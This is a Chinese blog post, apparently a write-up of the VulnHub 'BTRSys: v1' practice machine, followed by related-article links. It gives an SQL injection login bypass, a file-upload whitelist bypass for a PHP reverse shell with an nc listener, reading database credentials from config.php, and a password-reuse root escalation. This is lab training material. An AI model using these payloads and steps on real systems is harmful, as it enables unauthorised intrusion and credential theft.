BTRSys: v1靶机

最新推荐文章于 2024-01-06 10:16:01 发布
最新推荐文章于 2024-01-06 10:16:01 发布
阅读量747 收藏 9
点赞数 3
分类专栏: 靶机 文章标签: php linux shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_48985780/article/details/117688936
版权

 

BTRSys: v1靶机

靶机地址:https://www.vulnhub.com/entry/btrsys-v1,195/

靶机难度:初级/中级

 

arp-scan -l 扫描获取靶机ip:x.x.x.229

nmap -sV -Pn -A x.x.x.229 扫描出80,22,21端口

dirb http://x.x.x.229 -X .php

扫描出config.php,login.php

登录,弱口令,不成功

查看源码

substring就是截取,从“@”符号后一位开始截取到输入的user账号的长度,即从@到结束;且str中必须是btrisk.com

pwd很明显,直接随便构造一个注入

账号:xxx@btrisk.com
密码:' or 1=1 -- -

登录成功,上传文件点

burp截包-上传文件getshell

可以上传,直接上反弹phpshell

白名单写死了,只能是JPG或者PNG,那就将shell.php改成shell.jpg

burp截包,截断将jpg后缀改成php后缀,go,上传成功

在http://x.x.x/uploads/中可以看到上传的反弹phpshell

在kali中nc -lvp 1234打开监听,等待反弹

进入交互模式 python -c 'import pty;pty.spawn("/bin/bash")'

进入shell中,到网站根目录看下配置文件config.php

发现数据库密码

$con=mysqli_connect("localhost","root","toor","deneme");

直接登录数据库看看有什么

mysql -u root -p

mysql> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| deneme             |
| mysql              |
| performance_schema |
+--------------------+
4 rows in set (0.00 sec)
mysql> use deneme;
use deneme;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
show tables;
+------------------+
| Tables_in_deneme |
+------------------+
| user             |
+------------------+
1 row in set (0.00 sec)

mysql> select * from user
select * from user
    -> ;
;
+----+-------------+------------------+-----------+---------+-------------+---------+-------------+--------------+
| ID | Ad_Soyad    | Kullanici_Adi    | Parola    | BabaAdi | BabaMeslegi | AnneAdi | AnneMeslegi | KardesSayisi |
+----+-------------+------------------+-----------+---------+-------------+---------+-------------+--------------+
|  1 | ismail kaya | ikaya@btrisk.com | asd123*** | ahmet   | muhasebe    | nazli   | lokantaci   |            5 |
|  2 | can demir   | cdmir@btrisk.com | asd123*** | mahmut  | memur       | gulsah  | tuhafiyeci  |            8 |
+----+-------------+------------------+-----------+---------+-------------+---------+-------------+--------------+

密码都是:asd123***

直接su root

总结

1、该靶机的重点在于只给你一个登陆界面,啥信息都没有的情况下,要么爆破,要么注入、绕过。
2、后台上传界面,而且上传后也没有检查文件名,截包绕过白名单限制上传。

xzhome
关注
  • 3
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
cms.rar,靶机的源码
07-03
【CMS靶机源码解析与相关知识点】 CMS(Content Management System,内容管理系统)是一种用于构建和管理网站的应用程序,它提供了便捷的用户界面,让非技术背景的人员也能轻松编辑和发布内容。在这个名为“cms.rar...
靶机渗透——BTRsys1
1匹黑马
02-23 1670
文章目录任务环境信息收集漏洞挖掘漏洞利用权限获取权限提升 任务环境 攻击机:Kali2019 靶机:BRTsys1 涉及知识点:代码审计、目录遍历、文件上传、脏牛提权 信息收集 还是老样子先进行信息收集: arp-scan -l #扫描内网存活主机 接着扫一下开放的端口与版本信息 nmap -sV -O 192.168.1.116 开放了22、80端口,话不多说,直接扫一下Web页面...
BTRsys1
qq_42307546的博客
11-03 329
首先进行端口扫描发现21,22,80开放 进行目录扫描发现一个登录页面,login.php function control(){ var user = document.getElementById("user").value; var pwd = document.getElementById("pwd").value; var str=user.substring(user.lastIndexOf("@")+1,user.length); if((pwd == "'
BTRSys1靶场复现详细过程
hcufo的博客
09-06 245
一次靶详细的靶场演练,非常成功
Hack the BTRSys1(Boot2Root Challenge)【VulnHub靶场】渗透测试实战系列1
重新启程
11-25 1280
靶场下载地址:BTRSys: v1 下载完毕之后直接导入到VMWare,看下设置了DHCP,那就在内网网段~~ 接着就打开内网的另外一台攻击机器Kali,首先搜集一下信息,Zenmap开始扫描,其实也就是nmap包装了一个UI界面。 Okay,扫描结果出来了,看下图: 主要提供了下面三个服务端口: vsftd,这个应该版本有点老,可以exploit一下,小本本记下来 ss...
BTRSys:v2.1靶机
小小猪的博客
06-07 429
BTRSys:v2.1靶机 主机扫描,arp-scan -l nmap -sV -pN -A x.x.x.228,发现80,21,22端口 dirb http://x.x.x.228,发现网站是wordpress搭建的 用wpscan枚举用户和插件,找到了两个用户btrisk和admin wpscan --url http://x.x.x.228/wordpress -e u vp 爆破出用户admin的密码admin wpscan --url http://x.x.x
PWN靶机环境 网络安全
05-23
PWN靶机环境
web渗透测试靶机(新手)
05-07
Web渗透测试靶机是针对新手入门的网络安全学习平台,它模拟了实际的Web应用程序环境,让你可以在一个安全可控的环境中实践渗透测试技术。这个靶机通常包含一系列具有不同安全漏洞的Web应用,让学习者通过查找和利用...
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
靶机GoldenEye-V1练习报告1
08-08
靶机GoldenEye-V1练习报告1
靶机实战(9):OSCP备考之VulnHub BTRSys v2.1
最新发布
OneMoreThink
01-06 959
靶机官网:BTRSys: v2.1[1]实战思路:一、主机发现二、端口发现(服务、组件、版本)三、漏洞发现(获取权限)21端口/FTP服务组件漏洞口令漏洞22端口/SSH服务组件漏洞口令漏洞80端口/HTTP服务组件漏洞URL漏洞(目录、文件)四、提升权限www-data用户sudosuidcron内核提权信息收集btrisk用户sudo一、主机发现本次攻击指定IP,不涉及主机发现过程。二、端口发...
Vulnhub-Btrsys-2靶机实战
御七彩虹猫
04-18 2750
Vulnhub-Btrsys-2靶机实战
CTF靶场——BTRsys-2
su__xiaoyan的博客
01-24 1057
实验环境 攻击机:192.168.100.146 靶机:192.168.100.139 实验流程 端口扫描 端口详细信息探测 命令:nmap -T4 -A -v 靶机IP地址 FTP服务由vsftpd 3.0.3搭建,不存在代码溢出漏洞 网站详细信息探测 网站疑似使用WordPress作为建站系统 web网站目录爆破 证实以WordPress作为建站系统,并且拿到网站后台登录页面 访问网站后台登录页面,尝试使用弱口令进行登录,登录成功(admin/admin) 漏洞利用 WordPress后台存
BTRsys-2
qq_42307546的博客
11-04 437
nmap对目标进行扫描 nmap -A -p 80,21,22 -oA BTR.log Starting Nmap 7.80 ( https://nmap.org ) at 2021-11-04 00:16 CST WARNING: No targets were specified, so 0 hosts scanned. Nmap done: 0 IP addresses (0 hosts up) scanned in 1.24 seconds root@kali:~/BTRsys-2# nmap -A
vulnhub BTRSys: v2.1
箭雨镜屋
08-30 546
渗透思路:nmap扫描端口 ---- gobuster扫描网站目录 ---- wpscan扫描wordpress用户名并爆破密码 ---- 利用WordPress的模板编辑功能getshell ---- wordpress配置文件泄露数据库用户名密码 ---- 数据库泄露btrisk用户的密码 ---- sudo su提权...
靶机渗透测试实战(六)——Zico2渗透实战
橘子女侠
05-11 6714
目录 一. 实验环境 二. 实验流程 三. 实验步骤 (一)信息收集——主机发现 1. 查看Kali的IP信息;(IP:192.168.37.131) 2. 扫描主机(netdiscover) (二)信息收集——端口扫描 1. 扫描端口(masscan) 2. 详细扫描端口信息(nmap) (三)渗透测试 80端口(http服务) 1. 访问目标靶机的80端口 ...
wordpress拿WebShell
weixin_34301307的博客
02-21 433
v\:* {behavior:url(#default#VML);} o\:* {behavior:url(#default#VML);} w\:* {behavior:url(#default#VML);} .shape {behavior:url(#default#VML);} wordpress拿WebShell Simeon 安天365    WordP...
靶机渗透(二)bulldog1
qq_42180996的博客
04-26 1604
靶机bulldog1 一、实验环境 二、实验步骤 (一)信息收集 1.查询测试机IP地址,判断所处网段 2.主机发现(netdiscover) 3.端口扫描(masscan/namp) (二)http服务(80/8080端口) 1.靶机开启apache服务,尝试web渗透 2.网站指纹信息扫描(whatweb) 3.目录扫描(dirb) 4.查看/admin页面 5....
the planets: earth靶机
04-11
问题:关于行星:地球和静机。 回答:这个问题似乎出现了编码问题,其中“Earth静机”不是一个有意义的词语,因此无法给出明确的回答。如果问题中的“静机”是指其他行星,可以尝试使用正确的编码再次提交问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值